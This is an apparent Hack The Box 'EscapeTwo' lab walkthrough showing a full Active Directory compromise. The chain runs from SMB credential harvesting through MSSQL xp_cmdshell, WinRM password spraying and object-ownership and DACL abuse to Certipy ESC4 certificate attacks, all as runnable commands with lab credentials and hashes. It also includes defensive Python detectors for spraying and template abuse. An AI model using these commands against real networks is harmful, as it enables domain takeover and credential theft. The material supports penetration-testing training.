HTB — EscapeTwo Writeup: Active Directory Attacks in Windows Environment
This article describes a penetration test of the EscapeTwo machine, using SMB enumeration, MSSQL privilege escalation and certificate-services abuse to obtain Domain Admin rights. 2025-12-19 07:40:59 Author: infosecwriteups.com (view original) Reads: 6

Aashraymt

As a cybersecurity enthusiast and red teamer in training, I’ve always found the complexity of Active Directory (AD) environments both fascinating and daunting. Hack The Box has consistently provided great hands-on learning opportunities, and EscapeTwo was no exception. This machine emulates a real-world Windows enterprise network, requiring a combination of enumeration, SMB exploitation, credential hunting, and MSSQL abuse to navigate through it.

This writeup reflects my step-by-step experience tackling EscapeTwo — from identifying exposed services to executing system commands via MSSQL. My goal with this post is to document my thought process, reinforce my learning, and share useful techniques with others on the same path.

Overview

Machine Name: EscapeTwo
IP Address: 10.10.11.51
Initial Creds: rose : KxEPkKe6R8su
Difficulty: Intermediate
Tech Stack: Active Directory, SMB, MSSQL, Windows Server 2019

Initial Reconnaissance

We start our enumeration by conducting a full TCP port scan along with service and version detection using Nmap:

nmap -p- -sV -sC -O 10.10.11.51


These ports clearly indicate that the target is part of a Windows Active Directory environment. SMB and Kerberos are immediate areas of interest.

SMB Enumeration

We have valid user credentials (rose : KxEPkKe6R8su), so we proceed to enumerate SMB shares:

Method 1: Using Nmap NSE scripts

nmap --script smb-enum-shares,smb-enum-users -p 445 10.10.11.51

Method 2: Using nxc

nxc smb 10.10.11.51 -u 'rose' -p 'KxEPkKe6R8su' --shares

This reveals multiple shares, including one particularly interesting one: Accounting Department (READ).


Exploiting SMB Share

We use smbclient to access the share and extract any sensitive documents:

smbclient //10.10.11.51/Accounting\ Department -U 'rose'


Once inside, we list and download the Excel documents:

ls
get accounts.xlsx
get accounting_2024.xlsx


The file may not be what it seems; run file against it to reveal the real format:


Now unzip the downloaded files locally (an .xlsx is a ZIP archive) and look through every file inside; some of them contain usernames and passwords.

We found some usernames and passwords in xl/sharedStrings.xml

Converting the XML into a tab-separated table, five columns per row:

xmlstarlet sel -t -m "//si" -v "t" -n file.xml | awk 'NR<=5 {header[NR]=$0; next} {printf "%s\t", $0; if (NR%5==0) print ""}'
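The one-liner above lays the shared strings out by position, which only lines up when no cell value repeats. As an added example (not code from the original writeup), here is the same extraction in Python that resolves the worksheet's cell indices against xl/sharedStrings.xml, so repeated values do not shift the rows. The spreadsheet content is constructed inline; the function names and the header-matching rule in credential_pairs are this example's own assumptions.

```python
"""Recover worksheet rows from an .xlsx by resolving its shared strings.

Added example, not code from the original writeup. An .xlsx is a ZIP
archive: xl/sharedStrings.xml stores each distinct cell string once, and
xl/worksheets/sheet1.xml stores cells whose t="s" value is an INDEX into
that table. Chunking sharedStrings.xml into fixed-width rows (the
xmlstarlet + awk one-liner) only lines up when no string repeats; resolving
the indices through the worksheet reproduces the real grid. All sample data
below is constructed.
"""
from __future__ import annotations
import io
import zipfile
import xml.etree.ElementTree as ET

MAIN_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS = {"m": MAIN_NS}
T_TAG = f"{{{MAIN_NS}}}t"


def shared_strings(zf: zipfile.ZipFile) -> list[str]:
    """Shared-string table in index order; rich-text runs (<r><t>) are joined."""
    root = ET.fromstring(zf.read("xl/sharedStrings.xml"))
    return ["".join(t.text or "" for t in si.iter(T_TAG))
            for si in root.findall("m:si", NS)]


def naive_chunks(xlsx_bytes: bytes, width: int) -> list[list[str]]:
    """What the xmlstarlet + awk pipeline does: split the table by position."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        sst = shared_strings(zf)
    return [sst[i:i + width] for i in range(0, len(sst), width)]


def sheet_rows(xlsx_bytes: bytes,
               sheet: str = "xl/worksheets/sheet1.xml") -> list[list[str]]:
    """Worksheet as rows of cell text, with shared-string indices resolved."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        sst = shared_strings(zf)
        root = ET.fromstring(zf.read(sheet))
    rows = []
    for row in root.findall(".//m:row", NS):
        cells = []
        for c in row.findall("m:c", NS):
            v = c.find("m:v", NS)
            raw = v.text if v is not None and v.text is not None else ""
            if c.get("t") == "s":            # index into shared strings
                cells.append(sst[int(raw)])
            elif c.get("t") == "inlineStr":  # text stored inline in <is><t>
                cells.append("".join(t.text or "" for t in c.iter(T_TAG)))
            else:                            # number / bool / formula result
                cells.append(raw)
        rows.append(cells)
    return rows


def credential_pairs(rows: list[list[str]]) -> list[tuple[str, str]]:
    """Pair username and password columns by their header labels."""
    header = [h.lower() for h in rows[0]]
    u = next(i for i, h in enumerate(header) if "user" in h)
    p = next(i for i, h in enumerate(header) if "pass" in h)
    return [(r[u], r[p]) for r in rows[1:] if len(r) > max(u, p)]


def build_sample_xlsx() -> bytes:
    """Constructed .xlsx with just the two parts this demo reads.
    'Sales' is used twice, so positional chunking shifts every later row."""
    sst = ["Department", "Username", "Password", "Sales",
           "alice.example", "Example-Pass-1", "bob.example", "Example-Pass-2"]
    grid = [[0, 1, 2], [3, 4, 5], [3, 6, 7]]          # shared-string indices
    sst_xml = (f'<sst xmlns="{MAIN_NS}">'
               + "".join(f"<si><t>{s}</t></si>" for s in sst) + "</sst>")
    rows_xml = "".join(
        f'<row r="{ri + 1}">' + "".join(
            f'<c r="{chr(65 + ci)}{ri + 1}" t="s"><v>{idx}</v></c>'
            for ci, idx in enumerate(r)) + "</row>"
        for ri, r in enumerate(grid))
    sheet_xml = (f'<worksheet xmlns="{MAIN_NS}"><sheetData>{rows_xml}'
                 "</sheetData></worksheet>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("xl/sharedStrings.xml", sst_xml)
        zf.writestr("xl/worksheets/sheet1.xml", sheet_xml)
    return buf.getvalue()


if __name__ == "__main__":
    data = build_sample_xlsx()
    print("positional chunks:", naive_chunks(data, 3))
    for row in sheet_rows(data):
        print("\t".join(row))
    print("credentials:", credential_pairs(sheet_rows(data)))
```

Run it on a real file by passing the bytes of the .xlsx to sheet_rows; the positional chunks printed first show how the one-liner's output drifts once a value such as a department name is reused.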


Now we try to log in to MSSQL to check whether the credentials are valid:

nxc mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth


Connecting to the database using Impacket's mssqlclient.py:

python3 mssqlclient.py sa:'MSSQLP@ssw0rd!'@10.10.11.51

Keep the password in single quotes, since it contains special characters.

To see the version that is running:

SELECT @@version;


Connected successfully to the database, and the version number is visible.

Next, list the databases and test command execution through xp_cmdshell:

SELECT name FROM sys.databases;

EXEC xp_cmdshell 'whoami';


If xp_cmdshell is disabled, enable it first:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;


Confirm the setting:

EXEC sp_configure 'xp_cmdshell';

Post-Exploitation — File Discovery

Searching for .txt files across the C: drive:

EXEC xp_cmdshell 'dir C:\*txt /s';


Nothing interesting here, so we move on to other directories and find SQL2019.

Let's see whether there is anything more interesting in there.

We find configuration files, so let's read the SQL installation's configuration file to see the details.

Privilege Escalation via Configuration Files & Password Spraying

EXEC xp_cmdshell 'type C:\SQL2019\ExpressAdv_ENV\sql-Configuration.INI';


From here we get SQLSVCPASSWORD: WqSZAF6CysDQbGb3

Checking this password directly fails, so we test it against the other domain users with password spraying:

1. Enumerate the domain users and save them in a file named adusers.txt:

nxc smb 10.10.11.51 -u 'rose' -p 'KxEPkKe6R8su' --users

2. Spray the password across the user list over WinRM:

nxc winrm 10.10.11.51 -u adusers.txt -p WqSZAF6CysDQbGb3


The password is confirmed for the user ryan.
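A spray like the nxc winrm step above is loud from the defender's side: one source tries one password against many accounts in seconds, then logs on successfully as whichever account it matched. As an added example (not code from the original writeup), the detector below finds that pattern in a constructed, simplified log format; the event-ID mapping (4625 failed logon, 4624 successful logon), the window and the threshold are this example's assumptions, and the usernames other than rose, ryan and ca_svc are made up.

```python
"""Detect password spraying in authentication-failure events.

Added example, not code from the original writeup. A spray like the nxc
winrm step above tries ONE password against MANY accounts from one source,
so the trace is many distinct usernames failing from the same IP in a short
window, none of them often enough to hit a lockout threshold, often followed
by a successful logon from that source. The line format below is a
constructed, simplified key=value form, not raw Windows event XML.
"""
from __future__ import annotations
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one user mistyping a password, then a spray from
# 10.0.0.99 that lands on ryan (4625 = failed logon, 4624 = successful logon).
SAMPLE_LOG = """\
2025-01-29T02:50:01Z event=4625 src=10.0.0.7 user=alice
2025-01-29T02:50:03Z event=4625 src=10.0.0.7 user=alice
2025-01-29T02:50:05Z event=4624 src=10.0.0.7 user=alice
2025-01-29T02:51:00Z event=4625 src=10.0.0.99 user=rose
2025-01-29T02:51:01Z event=4625 src=10.0.0.99 user=ca_svc
2025-01-29T02:51:02Z event=4625 src=10.0.0.99 user=svc_a
2025-01-29T02:51:03Z event=4625 src=10.0.0.99 user=svc_b
2025-01-29T02:51:04Z event=4625 src=10.0.0.99 user=svc_c
2025-01-29T02:51:05Z event=4624 src=10.0.0.99 user=ryan
"""


def parse_event(line: str) -> dict:
    """'<iso-time> k=v k=v ...' -> dict with a datetime under 'ts'."""
    ts, *pairs = line.split()
    rec = dict(p.split("=", 1) for p in pairs)
    rec["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return rec


def detect_spray(log_text: str, window: timedelta = timedelta(minutes=5),
                 min_users: int = 4) -> list[dict]:
    """One alert per source IP whose failures span >= min_users distinct
    accounts inside any `window`; lists successful logons right after."""
    failures: dict[str, list] = defaultdict(list)   # src -> [(ts, user)]
    successes: dict[str, list] = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        r = parse_event(line)
        bucket = failures if r["event"] == "4625" else successes
        bucket[r["src"]].append((r["ts"], r["user"]))

    alerts = []
    for src, fails in failures.items():
        fails.sort()
        best, best_lo, lo = 0, 0, 0
        for hi in range(len(fails)):          # sliding window over failures
            while fails[hi][0] - fails[lo][0] > window:
                lo += 1
            distinct = len({u for _, u in fails[lo:hi + 1]})
            if distinct > best:
                best, best_lo = distinct, lo
        if best < min_users:
            continue
        start = fails[best_lo][0]
        landed = sorted({u for t, u in successes.get(src, [])
                         if start <= t <= fails[-1][0] + window})
        alerts.append({"src": src, "distinct_users": best,
                       "first_failure": start.isoformat(),
                       "logon_after": landed})
    return alerts


if __name__ == "__main__":
    for a in detect_spray(SAMPLE_LOG):
        print(a)
```

The per-account counters that drive lockout policy never trip here, because each account fails once; counting distinct accounts per source is what surfaces the spray, and a success from the same source right after the burst is the part worth paging on.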

Now we log in to ryan's account.


Logging into ryan's account with the evil-winrm tool:

evil-winrm -i 10.10.11.51 -u ryan -p 'WqSZAF6CysDQbGb3'


Now go to the Desktop; the hash is in a text file there.


Hash: 7cba1693ecbb29413a19cb2e87e4bea9

BloodHound Enumeration with SharpHound

Now let's use SharpHound to collect the data for BloodHound analysis.

Download SharpHound from https://github.com/SpecterOps/SharpHound/releases and upload it through the evil-winrm session:

upload SharpHound.exe
ls


.\SharpHound.exe --CollectionMethods All --ZipFileName output.zip


Run ls to see the output file.


Using Impacket’s owneredit.py, we try to assign ownership:

python3 owneredit.py -action write -new-owner 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'

This throws an error because the hostname sequel.htb does not resolve.

sudo nano /etc/hosts

Add the line 10.10.11.51 sequel.htb and try again:


This time the command succeeds: ryan is now the owner of the ca_svc object. Impacket's owneredit example script is what changes the ownership.

python3 owneredit.py -action write -new-owner 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'


Now that ryan owns the ca_svc object, we grant ryan the GenericAll (FullControl) privilege over it.

Impacket’s dacledit can be used for that purpose:

python3 dacledit.py -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'


Certificate Abuse and Domain Admin Access

We use pyWhisker to add a key credential (with its certificate) to ca_svc:

python3 pywhisker.py -d "sequel.htb" -u "ryan" -p "WqSZAF6CysDQbGb3" --target "ca_svc" --action "add"


Make a note of two things, the PFX file and its password:

PFX file: vfPE5BZG.pfx

password: nODWEZzArQr6E3i5wbpl
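Every step of this takeover (owner rewrite, DACL rewrite, key-credential write) modifies attributes of the ca_svc account, and with object auditing enabled each modification is logged. As an added example (not code from the original writeup), the detector below looks for that sequence in a constructed, simplified event format; the attribute names are the real LDAP attributes involved, while ADMIN_SUBJECTS, the window and all subjects other than ryan and ca_svc are this example's assumptions.

```python
"""Flag the object-takeover chain above in directory-change audit events.

Added example, not code from the original writeup. With object auditing
enabled on user accounts, each step leaves an event 5136 (directory service
object modified): owneredit rewrites the owner and dacledit the DACL, both
changes to nTSecurityDescriptor, and pywhisker writes msDS-KeyCredentialLink.
nTSecurityDescriptor followed by msDS-KeyCredentialLink changing on one
account, made by a subject that is neither that account nor a known admin,
is the signature. Sample events are constructed in a simplified key=value
form, not raw event XML; ADMIN_SUBJECTS is a placeholder allow-list.
"""
from __future__ import annotations
from collections import defaultdict
from datetime import datetime, timedelta

ADMIN_SUBJECTS = {"Administrator", "pki-admin"}   # constructed allow-list
SD_ATTR = "nTSecurityDescriptor"
KCL_ATTR = "msDS-KeyCredentialLink"

# Constructed sample 5136 events: the chain against ca_svc, a self-service
# key-credential write (device/WHfB style) and an unrelated admin change.
SAMPLE_EVENTS = """\
2025-01-29T03:10:00Z subject=ryan object=ca_svc attr=nTSecurityDescriptor
2025-01-29T03:12:00Z subject=ryan object=ca_svc attr=nTSecurityDescriptor
2025-01-29T03:15:00Z subject=ryan object=ca_svc attr=msDS-KeyCredentialLink
2025-01-29T03:20:00Z subject=WS01$ object=WS01$ attr=msDS-KeyCredentialLink
2025-01-29T03:25:00Z subject=pki-admin object=bob attr=description
2025-01-29T03:30:00Z subject=helpdesk1 object=carol attr=msDS-KeyCredentialLink
"""


def parse_event(line: str) -> dict:
    """'<iso-time> k=v k=v ...' -> dict with a datetime under 'ts'."""
    ts, *pairs = line.split()
    rec = dict(p.split("=", 1) for p in pairs)
    rec["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return rec


def detect_takeover(log_text: str,
                    window: timedelta = timedelta(hours=1)) -> list[dict]:
    """Alerts per object: 'high' when a security-descriptor change is followed
    by a key-credential write from the same foreign subject inside `window`;
    'medium' for any foreign, non-admin key-credential write on its own."""
    by_object: dict[str, list[dict]] = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            r = parse_event(line)
            by_object[r["object"]].append(r)

    alerts = []
    for obj, events in by_object.items():
        events.sort(key=lambda e: e["ts"])
        # ignore self-writes and allow-listed admins; the rest is "foreign"
        foreign = [e for e in events
                   if e["subject"] != obj and e["subject"] not in ADMIN_SUBJECTS]
        for e in foreign:
            if e["attr"] != KCL_ATTR:
                continue
            priors = [p for p in foreign
                      if p["attr"] == SD_ATTR and p["subject"] == e["subject"]
                      and timedelta(0) <= e["ts"] - p["ts"] <= window]
            alerts.append({
                "object": obj, "subject": e["subject"],
                "severity": "high" if priors else "medium",
                "chain": [p["attr"] for p in priors] + [KCL_ATTR],
                "at": e["ts"].isoformat()})
    return alerts


if __name__ == "__main__":
    for a in detect_takeover(SAMPLE_EVENTS):
        print(a)
```

A computer account writing its own msDS-KeyCredentialLink is normal device behaviour, which is why self-writes are filtered; a user account's key credential being written by a different user, shortly after that user rewrote the account's security descriptor, has no routine explanation.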

Using PKINITtools, we obtain a TGT with the certificate (PKINIT) and then recover the NT hash:

python PKINITtools/gettgtpkinit.py sequel.htb/ca_svc -cert-pfx vfPE5BZG.pfx -pfx-pass nODWEZzArQr6E3i5wbpl -dc-ip 10.10.11.51 escapetwo


Key (the AS-REP encryption key printed by gettgtpkinit.py, needed for the next step): 5d900ae62fe0eb483b9890d0902355618053e5325b9bf38752c2580d67dffbfb

python3 PKINITtools/getnthash.py sequel.htb/ca_svc -key 5d900ae62fe0eb483b9890d0902355618053e5325b9bf38752c2580d67dffbfb -dc-ip 10.10.11.51


NT Hash: 3b181b914e7a9d5508ea1e20bc2b7fce

Verify access with the NT hash:

nxc smb 10.10.11.51 -u ca_svc -H 3b181b914e7a9d5508ea1e20bc2b7fce


Enumerate certificate templates with Certipy:

certipy-ad find -u ca_svc@sequel.htb -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -dc-ip 10.10.11.51 -debug


certipy-ad template -template DunderMifflinAuthentication -u ca_svc@sequel.htb -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -dc-ip 10.10.11.51 -debug -save-old


Modifying the vulnerable template

certipy-ad template -template DunderMifflinAuthentication -u ca_svc@sequel.htb -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -dc-ip 10.10.11.51 -debug


Confirming the template vulnerabilities:

certipy-ad find -u ca_svc@sequel.htb -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -vulnerable


cat 20250129025005_Certipy.txt


Save the old template and apply the modified one on the CA server:

certipy-ad template -dc-ip 10.10.11.51 -u ca_svc@sequel.htb -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -template DunderMifflinAuthentication -target DC01.sequel.htb -save-old
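What makes this template exploitable is a combination of settings, and the certipy template command changes those settings rather than the CA itself. As an added example (not code from the original writeup, and not Certipy's code or output format), the audit below encodes the two conditions involved: ESC4, where a low-privileged principal can write the template object, and ESC1, the state the template is put into so that an arbitrary UPN can be requested. The template records, the principal names (other than ca_svc and Domain Admins) and the rights granted to ca_svc are constructed for the demo.

```python
"""Audit AD CS certificate templates for ESC4 and ESC1 exposure.

Added example, not code from the original writeup and not Certipy's code or
output format. ESC4: a low-privileged principal holds write rights on the
template object (WriteOwner, WriteDacl, WriteProperty, GenericAll), so it can
rewrite the template into an ESC1 shape, which is what the certipy template
command above does. ESC1: an enabled template issues client-authentication
certificates, lets the enrollee supply the subject (any UPN can be requested),
needs no manager approval, and is enrollable by low-privileged principals.
Template records here are a constructed data model with placeholder names.
"""
from __future__ import annotations
from dataclasses import dataclass, field

PRIVILEGED = {"Domain Admins", "Enterprise Admins", "Administrators"}
WRITE_RIGHTS = {"WriteOwner", "WriteDacl", "WriteProperty",
                "GenericAll", "GenericWrite"}
# EKUs usable for logon; a template with NO EKU at all also qualifies.
CLIENT_AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication",
                    "Smart Card Logon", "Any Purpose"}


@dataclass
class Template:
    name: str
    enabled: bool
    ekus: set[str]
    enrollee_supplies_subject: bool
    manager_approval: bool
    enrollment: set[str]                 # principals holding Enroll rights
    # principal -> rights on the template object itself (its ACL)
    rights: dict[str, set[str]] = field(default_factory=dict)


def low_priv(principals) -> list[str]:
    """Principals that are not in the privileged allow-list, sorted."""
    return sorted(p for p in principals if p not in PRIVILEGED)


def audit(t: Template) -> list[tuple[str, list[str]]]:
    """Return (code, principals) findings for one template."""
    findings = []
    writers = low_priv(p for p, r in t.rights.items() if r & WRITE_RIGHTS)
    if writers:
        findings.append(("ESC4", writers))
    logon_capable = not t.ekus or bool(t.ekus & CLIENT_AUTH_EKUS)
    enrollers = low_priv(t.enrollment)
    if (t.enabled and logon_capable and t.enrollee_supplies_subject
            and not t.manager_approval and enrollers):
        findings.append(("ESC1", enrollers))
    return findings


# Constructed states: the template as found (writable by ca_svc), the same
# template after being rewritten, and a correctly locked-down one.
BEFORE = Template("DunderMifflinAuthentication", True, {"Client Authentication"},
                  enrollee_supplies_subject=False, manager_approval=False,
                  enrollment={"Domain Admins"},
                  rights={"ca_svc": {"WriteOwner", "WriteDacl", "WriteProperty"},
                          "Domain Admins": {"GenericAll"}})
AFTER = Template("DunderMifflinAuthentication", True, {"Client Authentication"},
                 enrollee_supplies_subject=True, manager_approval=False,
                 enrollment={"Authenticated Users"},
                 rights={"ca_svc": {"WriteOwner", "WriteDacl", "WriteProperty"},
                         "Domain Admins": {"GenericAll"}})
HARDENED = Template("UserSigning", True, {"Secure Email"},
                    enrollee_supplies_subject=False, manager_approval=True,
                    enrollment={"Authenticated Users"},
                    rights={"Domain Admins": {"GenericAll"}})

if __name__ == "__main__":
    for label, t in (("before", BEFORE), ("after", AFTER), ("hardened", HARDENED)):
        print(label, t.name, audit(t) or "clean")
```

The fix for ESC4 is on the template object's ACL, not in the template's settings: as long as a non-admin principal keeps write rights, any hardening of the settings can be undone, so the audit reports the ACL finding regardless of how the template is currently configured.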


Request a certificate as the domain administrator:

certipy-ad req -ca sequel-DC01-CA -dc-ip 10.10.11.51 -u ca_svc@sequel.htb -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -template DunderMifflinAuthentication -target dc01.sequel.htb -upn administrator@sequel.htb -dns dc01.sequel.htb -debug

If an error occurs, install ntpdate (sudo apt install ntpdate), sync your clock with the DC, and run the request again.


Authenticate as administrator using the certificate:

certipy-ad auth -pfx administrator_dc01.pfx


Log in via evil-winrm with the administrator's NT hash:

evil-winrm -i 10.10.11.51 -u 'administrator' -H 7a8d4e04986afa8ed4060f75e5a0b3ff


Yayyy!!! Finally we got in!!! Now just retrieve the flag and submit it.

cd ..\Desktop

ls

cat root.txt

EscapeTwo was a great learning experience that tied together multiple core concepts of Active Directory exploitation. From initial SMB enumeration to abusing MSSQL features and ultimately compromising the domain via misconfigured certificate services (ESC4), each step reinforced how crucial enumeration, lateral movement, and privilege escalation techniques are in red teaming. This machine sharpened my understanding of ADCS abuse and helped me get more comfortable with tools like Certipy, SharpHound, and Impacket. Overall, it was a solid challenge that mirrored real-world attack paths and deepened my confidence in navigating Windows enterprise environments.


Source: https://infosecwriteups.com/htb-escapetwo-writeup-active-directory-attacks-in-windows-environment-d4ee339cb11a?source=rss----7b722bfd1b8d---4